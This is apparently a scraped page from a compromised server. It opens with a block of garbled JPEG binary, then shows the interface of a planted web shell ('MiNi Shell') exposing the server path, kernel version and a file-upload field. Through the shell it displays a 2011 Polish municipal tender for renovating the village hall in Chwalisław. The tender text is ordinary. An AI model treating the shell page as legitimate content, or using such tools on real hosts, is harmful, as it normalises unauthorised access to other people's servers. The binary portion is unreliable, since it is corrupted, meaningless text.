JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110516/115442-N-2011.html

<p class="kh_header"><b>Złoty Stok: Remont świetlicy wiejskiej w Chwalisławiu</b><br>
<b>Numer ogłoszenia: 115442 - 2011; data zamieszczenia: 16.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Złoty Stok , ul. Rynek 22, 57-250 Złoty Stok, tel. 0 74 8164164, faks 0 74 8164133.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zlotystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont świetlicy wiejskiej w Chwalisławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający poszukuje wykonawcy, który w wymaganym terminie i na warunkach określonych niniejszą specyfikacją i dokumentacją techniczną oraz przedmiarem pomocniczym, z należytą starannością, wykona niniejsze zamówienie.
Przedmiotem zamówienia jest inwestycja, polegająca na wykonaniu remontu świetlicy wiejskiej w miejscowości Chwalisław,  działka nr ewid. 378/1.   
Zamówienie obejmuje prace demontażowe: demontaż istniejącego pokrycia ceramicznego i ołacenia dachu, obróbek blacharskich i orynnowania, uszkodzonych elementów konstrukcji więźby dachowej, polepy trocinowej stropu, stolarki okiennej i drzwiowej, instalacji kanalizacyjnej, wodociągowej, c.o.  i elektrycznej oraz prace remontowe: naprawę, wymianę i impregnację elementów konstrukcji więźby dachowej, naprawę tynków trzonów kominowych oraz ich przemurowanie ponad dachem, wykonanie paroizolacji, wykonanie obróbek blacharskich i nowego orynnowania, montaż okienek wyłazowych, wykonanie nowego pokrycia z blachodachówki, montaż płotków przeciwśniegowych, montaż ław kominiarskich, montaż instalacji odgromowej, wykonanie naprawy stropu ponad parterem oraz izolacji termicznej, montaż sufitów z płyty g-k., montaż nowej stolarki okiennej i drzwiowej, wykonanie napraw wypraw tynkarskich na stropach i ścianach, montaż schodów drabiniastych składanych, licowanie płytkami ceramicznym oraz gresowymi ścian i posadzek w pomieszczeniach sanitarnych, montaż nowej instalacji kanalizacyjnej, wodociągowej, c.o. i elektrycznej, wykonanie powłok malarskich wewnętrznych, naprawę tynków elewacji oraz jej malowanie, wykonanie odwodnienia budynku, naprawę istniejących dojść, schodów i dojazdów zewnętrznych.     
	
Szczegółowe wytyczne, dotyczące wykonania prac i materiałów do wbudowania, znajdują się w dokumentacji technicznej przedsięwzięcia.

W zakresie robót do wykonania są:

I.  Prace przygotowawcze i zabezpieczające teren robót .

-opracowanie ogólnego harmonogramu prac,
-prace zabezpieczające miejsce prowadzonych robót przed osobami postronnymi wraz z właściwym oznakowaniem,
-organizacja placu budowy. (Uwaga zgodnie z zapisami umowy: wywóz i unieszkodliwienie odpadów, doprowadzenie energii elektrycznej i wody na potrzeby wykonywanych prac, uzyskanie zgody na zajęcie ulic i chodników na czas budowy oraz korzystania z nieruchomości sąsiedniej należy do obowiązków Wykonawcy). 

II. Prace demontażowe.

-rozbiórka pokrycia dachowego z dachówki karpiówki oraz ołacenia- 405.00m2, 
-rozbiórka obróbek blacharskich - 3.432m2, rynien - 50.00m, rur spustowych - 9.20m,
-rozbiórka podsufitki - 121.190m2 oraz zasypki - 121.190m2,
-rozbiórka podbudowy betonowej na dojściach - 47.033m2 oraz nawierzchni z kostki betonowej - 192.350m2,
-demontaż stolarki okiennej i drzwiowej,
-demontaż instalacji kanalizacyjnej i elementów jej uzbrojenia,
-demontaż instalacji wodociągowej i elementów jej uzbrojenia (uwaga: przepływowy ogrzewacz wody do ponownego wykorzystania),
-demontaż instalacji c.o. wraz z uzbrojeniem (uwaga: zdemontowane grzejniki, po zasięgnięciu opinii inwestora, do przekazania na jego rzecz lub do utylizacji),
-demontaż elementów instalacji elektrycznej.  

III. Prace w zakresie wymiany pokrycia dachowego. 

-naprawa krokwi poprzez nabicie nakładek z desek - 20.0m,
-wymiana krokwi - 1.244m3, jętek - 30.40m, podwalin i murłat - 48.0m, słupów - 13.0m,
-wykonanie nadbitek - 0.222m3, 
-naprawa wiązarów wieszakowych - 5szt,   
-wzmocnienie belek stropowych balami dwustronnie - 44.0m,
-prostowanie i wyrównanie więźby dachowej pow. - 405.0m2,
-odgrzybienie i impregnacja preparatami solnymi i środkami ogniochronnymi elementów więźby oraz innych elementów drewnianych - 202.50m2,
-wykonanie konstrukcji nośnej wyłazów, osadzenie i montaż nowych wyłazów dachowych - 2szt,
-wykonanie wiatrownic - 0.162m3,
-wykonanie wstępnego krycia z folii paroprzepuszczalnej - 405.0m2,
-wykonanie nowego ołacenia pod pokrycie z blachodachówki - 405.0m2, wraz z deską czołową 32.4m,
-przetarcie istniejących tynków trzonów kominowych poniżej dachów wraz białkowaniem - 24.64m2 oraz ich przemurowanie cegłą klinkierową ponad dachem - 0.336m3, 
-wykonanie nowego pokrycia z blachodachówki powlekanej (kolor zbliżony do istniejącego pokrycia) - 405m2 wraz z obróbkami blacharskimi i elementami wykończenia - gąsiorami, wiatrownicami szczytowymi, płotkami przeciwśniegowymi, 
-montaż nowych rynien z blachy ocynkowanej o  o 180mm  - 50.0m, oraz rur spustowych o  o 120 - 150mm - 9.2m,  
-montaż ław kominiarskich - 2szt,
-uszczelnienie połaci dachowej i naprawa tynków gzymsu.


IV. Prace w zakresie naprawy sufitów stropu nad parterem.

-wykonanie rusztu metalowego pod okładziny z płyt g-k - 121.19m2, wraz z montażem  okładziny z płyt g-k - 121.19m2(sufit podwieszany),   
-wykonanie izolacji przeciwwilgociowej z folii oraz dźwiękowej  i termicznej z wełny mineralnej dwuwarstwowo - 121.19m2.

V. Prace w zakresie wykonania posadzek. 

-wykonanie warstwy wyrównawczej pod posadzki z zaprawy cementowej grub. 20mm zatartej na gładko - 52.35m2,
-wykonanie izolacji przeciwwilgociowej z folii polietylenowej szerokiej - 52.35m2,
-gruntowanie i przygotowanie podłoża pod posadzki płytkowe -  52.35m2,
-ułożenie posadzki z płytek 30x30cm na kleju - 52.35m2, wraz z cokolikami o wys. 10cm - 35.1m,
-naprawa posadzki cementowej w piwnicy - 21,45m2,
-naprawa stopni schodów do piwnicy,
-wymiana desek podłogowych - podłoga na strychu - 37.74m2,
-wykonanie podłogi z desek struganych grub. 32mm podłoga strychu  nad salą dużą - 141.5m2, podłoga na jętkach - 70.5m2,

VI. Wykonanie wykładzin ścian w pomieszczeniach w.c.

-przygotowanie podłoża i gruntowanie pod wykonanie okładzin ściennych - 42.073m2,
-licowanie ścian płytkami ceramicznymi na kleju; kolorystyka do uzgodnienia z inwestorem - 42.073m2,
-przetarcie wraz z zeskrobaniem farby i wyrównanie istniejących tynków w.c.  i korytarza oraz ich gruntowanie i malowanie farbami emulsyjnymi; kolorystyka do uzgodnienia z inwestorem .

VII. Prace w zakresie wymiany stolarki.

-wymiana okien na okna uchylne, jednodzielne z PCW o pow. do 0.4m2 - 11szt,wraz z obróbką tynkarską ościeży, 
-wymiana okien na okna uchylne, jednodzielne z PCW o pow. do 1.0m2 - 2szt,wraz z obróbką tynkarską ościeży,
-wymiana okien na okna rozwierane i uchylno-rozwierane, dwudzielne z PCW o pow. do 2.0m2 - 12szt,wraz z obróbką tynkarską ościeży,
-wykonanie podokienników wewnętrznych i zewnętrznych, 
-wymiana stolarki drzwiowej wraz z ościeżnicami, skrzydła płytowe fabrycznie wykończone, wewnętrzne o pow. do 1.6m2,  jednodzielne pełne - 5szt, szklone do w.c. - 2szt,
-renowacja drzwi o wym. 150x210 i 90x200 cm wraz z ich malowaniem farbami do stolarki drzwiowej - 2szt.
-wykonanie bramy drewnianej ramowej, dwuskrzydłowej, obitej klepką wraz z ościeżnicą i obróbką tynkarską ościeży (lub równoważnej fabrycznie wykonanej) - 1szt, oraz drzwi do piwnicy  - 1szt.     
-wykonanie nowych drzwi wejściowych klepkowych (lub równoważnych, fabrycznie wykonanych) 

VIII. Roboty różne.

-wykonanie ścianek działowych z płytek z betonu komórkowego, grub. 12cm - 5.79m2, grub. 6cm - 11.06m2,
-wykonanie nowych tynków zwykłych kat. III w piwnicy i pom. gospodarczym na sklepieniach - 36.79m2,  
-odbicie i wykonanie tynków kat III w pomieszczeniach piwnicy, gospodarczym, strychu -  269. 89m2,    
-rozebranie i wykonanie nowych schodów drewnianych na strychu - 15 stopni wraz z policzkami,
-wykonanie nakrywy wejścia na strych - 1szt, 0,96m2 oraz montaż gotowych schodów składanych - 1szt,
-wykonanie przewodów wentylacyjnych i  wywietrzaków pomieszczeń.  

IX. Roboty malarskie wewnętrzne.

-przecieranie  istniejących tynków wewnętrznych na stropach i ścianach z zeskrobaniem farby lub równoważne zastosowanie, po ocenie stanu technicznego przez inspektora nadzoru, wyprawy z masy szpachlowej - 639.333m2,
-dwukrotne fluatowanie powierzchni wewnętrznej - 639.333m2, 
-dwukrotne malowanie farbami emulsyjnymi tynków wewnętrznych, kolorystyka do uzgodnienia z inwestorem -  639.333m2, 
-mechaniczne szlifowanie podłogi drewnianej wraz z trzykrotnym lakierowaniem - 28.2m2,
-dwukrotne malowanie farbami wapiennymi tynków ścian i sufitów piwnicy, strychu i pom. gospodarczych, kolorystyka do uzgodnienia z inwestorem, sufity - 269.890m2, ściany - 269.890m2.

X. Prace w zakresie odwodnienia i izolacji. 
   
-rozbiórka elementów betonowych chodnika - 1.8m3,
-wykonanie wykopu pod odwodnienie - 81.6m3,
-zbicie tynków wraz z odgrzybieniem ścian fund. - 71.3m2,
-wykonanie izolacji pionowej z folii kubełkowej - 71.3m2, 
-wykonanie podsypki filtracyjnej ze żwiru lub pospółki,
-ułożenie drenażu z rur z tworzyw sztucznych o o - 85.0m,  wraz ze studzienkami rewizyjnymi o o 425mm - 4szt. 
-zabezpieczenie warstwy filtracyjnej geowłókniną - 34m2,
-zasypanie wykopów pod odwodnienie wraz z odtworzeniem chodnika. 
 
XI. Prace w zakresie elewacji.

-oczyszczenie starego podłoża - 420.36m2, 
-uzupełnienie i naprawa istniejących tynków elewacji poprzez zbicie uszkodzonych i wykonanie nowych wypraw tynkarskich,
-przygotowanie tynków elewacji pod malowanie, poprzez dwukrotne gruntowanie preparatami gruntującymi - 420.36m2, 
-dwukrotne gruntowanie podłoża pod licowanie cokołu płytkami klinkierowymi wraz z wykonaniem tynku wyrównawczego - 32.37m2,  
-licowanie cokołu płytkami klinkierowymi -32.37m2, 
-dwukrotne malowanie elewacji farbami emulsyjnymi zewnętrznymi, kolorystyka do uzgodnienia z inwestorem - 420.36m2, 
 
XII. Prace w zakresie naprawy istniejących dojść i dojazdów.

-wyrównanie terenu -  192.35m2,
-ręczne profilowanie i zagęszczenie podłoża - 192.35m2,  
-wyrównanie istniejącej podbudowy mieszanką betonową z zagęszczeniem, grub. warstwy po zagęszczeniu do 10cm - 239.383m3,
-wykonanie ław betonowych z oporem pod krawężniki - 28.4m3, wraz z osadzeniem krawężników - 28.4m i krawężników wtopionych - 8.0m,
-wykonanie chodnika z kostki betonowej grub. 6cm na podsypce cementowo-piaskowej grub. 5cm - 47.033m2, 
-wykonanie nawierzchni z kostki betonowej grub. 8cm na podsypce cementowo-piaskowej grub. 5cm - 192.35m2,  
-skucie nierówności na istniejących schodach zewnętrznych i ich naprawa,
-wykonanie okładzin schodów z płytek zewnętrznych antypoślizgowych - 13.26m2 oraz dojścia do drzwi wejściowych - 3.9m2, 
-naprawa oraz dwukrotne malowanie farbami antykorozyjnymi barierek ochronnych - 66m. 

XIII. Prace w zakresie instalacji kanalizacyjnej.

-wykonanie bruzd i przebić w ścianach i stropach oraz ich późniejsze uzupełnienie i zamurowanie,  
-wymiana trójnika żeliwnego kanalizacyjnego o 150mm - 1szt i odcinka rury PCW o 110mm - 2miejsca,
-wykonanie rurociągu PCW o 110mm - 11.7m,
-wykonanie rurociągu PCW o 50mm - 2m, o 32mm - 2m, 
-montaż trójników PCW o 110mm - 2szt, czyszczaków kanalizacyjnych PCW o 110mm - 2szt, rury wywiewnej na połączeniu PCW o 110mm, 
-montaż uzbrojenia sieci kanalizacyjnej wraz z podejściami -  ustępów z płuczką typu compact - 2szt, umywalek ceramicznych na postumencie z syfonem - 2kpl, zlewozmywaków z syfonem - 2kpl,


XIV. Prace w zakresie instalacji wodociągowej.

-wykonanie niezbędnych bruzd i przebić w ścianach i stropach oraz ich późniejsze uzupełnienie i zamurowanie,
-wykonanie rurociągów miedzianych o połączeniach lutowanych o 22mm - 4m, o 18mm - 3m, o 15mm - 18m,
-wykonanie podejść w rurociągach miedzianych do płuczek ustępowych o połączeniach sztywnych o do 18mm - 2szt,   
-wykonanie podejść w rurociągach miedzianych do baterii i innego uzbrojenia o połączeniach elastycznych o do 18mm - 5szt,  
-montaż uzbrojenia sieci wodociągowej - zaworów przelotowych kulowych - 4szt, baterii umywalkowych - 2szt, baterii zmywakowych - 2szt, ogrzewacza elektrycznego wody V-50l - 1szt, ogrzewaczy wody V-10l - 2szt lub równoważnych przepływowych (po uzgodnieniu z inspektorem nadzoru),
-wykonanie otulinowej izolacji termicznej grub. 30mm z pianki poliuretanowej rur wodociągowych - 22m.  

XV. Prace w zakresie instalacji  c.o.

-wykonanie niezbędnych bruzd i przebić w ścianach i stropach oraz ich późniejsze uzupełnienie i zamurowanie,
-wykonanie rurociągów c.o. miedzianych o połączeniach lutowanych o 35mm grub. ścianki 1.5mm - 24m, o 28mm grub. ścianki 1.5mm - 18.6m, o 22mm grub. ścianki 1.0mm - 32m, o 18mm grub. ścianki 1.0mm - 6.6m, o 15mm grub. ścianki 1.0mm - 68.2m,
-montaż uzbrojenia sieci c.o., zaworów termostatycznych - 16szt, odpowietrzników automatycznych - 16szt, zaworów odcinających - 2szt, naczynia zbiorczego o poj. do 2m3  - 1szt, odmulacza - 1szt, termometru w tulei - 1szt, manometru w tulei - 1szt, zaworu bezpieczeństwa - 1szt, zaworów przelotowych - 4szt.        
-montaż grzejników stalowych typu brugman lub równoważnych wraz z podejściami - VK22/500/1.92 - 1kpl, VK22/500/1.6 - 5kpl, VK22/500/1.04 - 7kpl, VK22/600/0.64 - 1kpl, VK11/600/0.64 - 2kpl,
-wykonanie otulinowej izolacji termicznej grub. 30mm z pianki poliuretanowej rur c.o. - 149.4m,
  
XVI. Prace w zakresie instalacji elektrycznej.

-wykonanie niezbędnych bruzd, otworów, wnęk i przebić w ścianach i stropach oraz ich późniejsze uzupełnienie, zaprawienie i zamurowanie,
-wykonanie na zewnątrz nowej szafki złączowo-pomiarowej wraz z kompletnym osprzętem elektrycznym - 1kpl,
-wykonanie nowej rozdzielni elektrycznej typu RWW 4x12 wraz z kompletnym osprzętem elektrycznym - 1kpl, 
-ułożenie przewodu złączowego AsXSn 4x25mm2 w rurze ochronnej - 9m,
-ułożenie kabli YDYżo 5x10mm2 - 16m, 
-ułożenie przewodów wtynkowych YDYpżo 3x1.5mm - 422.0m, YDYpżo 2x1.5mm - 12m,    
-ułożenie przewodów kabelkowych płaskich YDYpżo 3x2.5mm - 386.0m, YDYpżo 5x2.5mm - 44.0m,   
-ułożenie przewodu wyrównawczego izolowanego DYżo 4mm2 - 44.0m, 
-ułożenie rur winidurowych dla anten wraz z przewodem antenowym - 64m,
-montaż osprzętu i uzbrojenia instalacji elektrycznej - gniazda RTV - 2szt, puszki rozgałęźnej piętrowej 25x25 - 1szt, puszki instalacyjnej podtynkowej o do 60mm - 2szt, masztu antenowego rurowego - 1szt, puszki instalacyjnej podtynkowej o do 60mm - 31szt, puszki instalacyjnej podtynkowej o do 80mm o dwóch wylotach - 30szt, odgałęźników bryzgoszczelnych o 4 wylotach - 9szt, łączników świecznikowych szczelnych - 1szt, łączników bryzgoszczelnych jednobiegunowych do puszek podtynkowych - 4szt, gniazd instalacyjnych wtyczkowych 10A  ze stykiem ochronnym szczelnych do puszek podtynkowych - 4szt, gniazd instalacyjnych wtyczkowych 16A  ze stykiem ochronnym bryzgoszczelnych - 34szt, gniazd instalacyjnych wtyczkowych 10A  ze stykiem ochronnym hermetycznych - 14szt, łączników jednobiegunowych w puszce instalacyjnej - 5szt, łączników świecznikowych w puszce instalacyjnej - 1szt, łączników krzyżowych dwubiegunowych podtynkowych w puszce instalacyjnej - 1szt, łączników bryzgoszczelnych jednobiegunowych szczelnych do puszki instalacyjnej  - 4szt, łączników krzyżowych dwubiegunowych - 1szt, łączników instalacyjnych bryzgoszczelnych jednobiegunowych - 2szt, gniazd instalacyjnych wtyczkowych 16A dwubiegunowych ze stykiem ochronnym bryzgoszczelnych przykręcanych - 1szt, zespołu przyłączeniowego 5P 32A/400V+WP32 - 2szt, wyłącznika zmierzchowego - 1szt,
-montaż opraw oświetleniowych świetlówkowych pyłoodpornych 2x40W - 2kpl, opraw oświetleniowych żarowych bryzgoszczelnych ze świetlówką kompaktową 2x24W - 14kpl, opraw oświetleniowych świetlówkowych rastrowych 2x36W - 22kpl, modułów awaryjnych - 9szt, opraw oświetleniowych żarowych bryzgoszczelnych porcelanowych przykręcanych - 1kpl.

XVII. Prace w zakresie instalacji odgromowej.
       
-montaż uziomów poziomych z bednarki w wykopie o głęb. do 0.6m - 75m, 
-montaż zwodów pionowych instalacji odgromowej fi 8 - 6szt,
-montaż przewodów instalacji odgromowej poziomych fi 8 na wspornikach - 30m,
-łączenie zwodów z uziomami poziomymi - 5szt
-złącza do rynny okapowej - 2szt.    
 
XVIII. Prace związane z odbiorami technicznymi, uporządkowaniem terenu i  przekazaniem do eksploatacji.

-wykonanie odbiorów technicznych, pomiarów, badań i sprawdzeń instalacji sanitarnych, zimnej i ciepłej wody, centralnego ogrzewania, antenowej oraz elektrycznej i odgromowej,
-wywiezienie nadmiaru ziemi, gruzu, i innych powstałych odpadów,
-uporządkowanie budowy i przyległych terenów,
-montaż 2 szt. gaśnic proszkowych 4kg ABC legalizowanych, wraz z normowym oznaczeniem dróg ewakuacyjnych i miejsca instalowania gaśnic,
-wykonanie dokumentacji powykonawczej łącznie z kosztorysem powykonawczym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.30.00-2, 45.11.12.20-6, 45.23.32.00-1, 45.26.10.00-4, 45.26.25.00-6, 45.31.00.00-3, 45.33.20.00-3, 45.33.11.00-7, 45.43.10.00-7, 45.41.00.00-4, 45.42.10.00-4, 45.44.21.00-8, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie przewiduje się pobierania wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonych dokumentów. Wykonawcy nie spełniający warunku zostaną wykluczeni z postępowania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonych dokumentów. Wykonawcy nie spełniający warunku zostaną wykluczeni z postępowania</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonych dokumentów. Wykonawcy nie spełniający warunku zostaną wykluczeni z postępowania</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonych dokumentów. Wykonawcy nie spełniający warunku zostaną wykluczeni z postępowania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

